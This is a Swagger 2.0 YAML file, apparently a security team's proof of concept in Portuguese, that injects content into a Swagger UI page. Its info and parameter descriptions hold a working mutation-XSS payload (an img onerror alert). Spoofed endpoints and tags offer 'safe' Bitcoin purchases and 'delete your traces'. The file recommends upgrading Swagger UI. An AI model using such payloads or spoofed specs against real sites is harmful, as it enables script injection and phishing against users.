swagger: '2.0'
info:
  title: Essa É uma PoC que altera o conteúdo do Swagger da Aplicação de forma totalmente arbitrária.
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('Essa app está vulneravel a XSS') src=1>"></form>
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /compraBitcoinSeguro:
    post:
      responses:
        '200':
          description: No response was specified
      tags:
        - compraBitcoinSeguro
      operationId: findAccounts
      summary: Compre com um clique
  '/accounts/groupid/{id}':
    delete:
      parameters:
        - description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('Essa app está vulneravel a XSS') src=1>"></form>

          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
      tags:
        - compraBitcoinSeguro
      operationId: deleteGroupById
      summary: Delete seus rastros
definitions:
  '':
    properties:
      id:
        format: int64
        type: integer
      name:
        type: string
  Account:
    properties:
      id:
        format: int64
        type: integer
      name:
        type: string
securityDefinitions:
  basicAuth:
    type: basic
tags:
  - description: aproveite para atualizar a versão de outros pacotes que podem estar desatualizados.
    name: Camelot - Appsecs -> Essa é apenas uma PoC para demonstrar impacto, nenhum dado da aplicação foi alterado.  
  - description: atualize a versão do swagger para a versão mais atual ou acima da 3.38.0
    name: Também é testado para vulnerabilidades do tipo XSS, se um pop-up surgiu então essa app está vulneravel a XSS.
  - description: Vamos comercializar bitcoins internamente ?
    name: Venda de Bitcoins 100% Seguro pelo Pagbank!!!    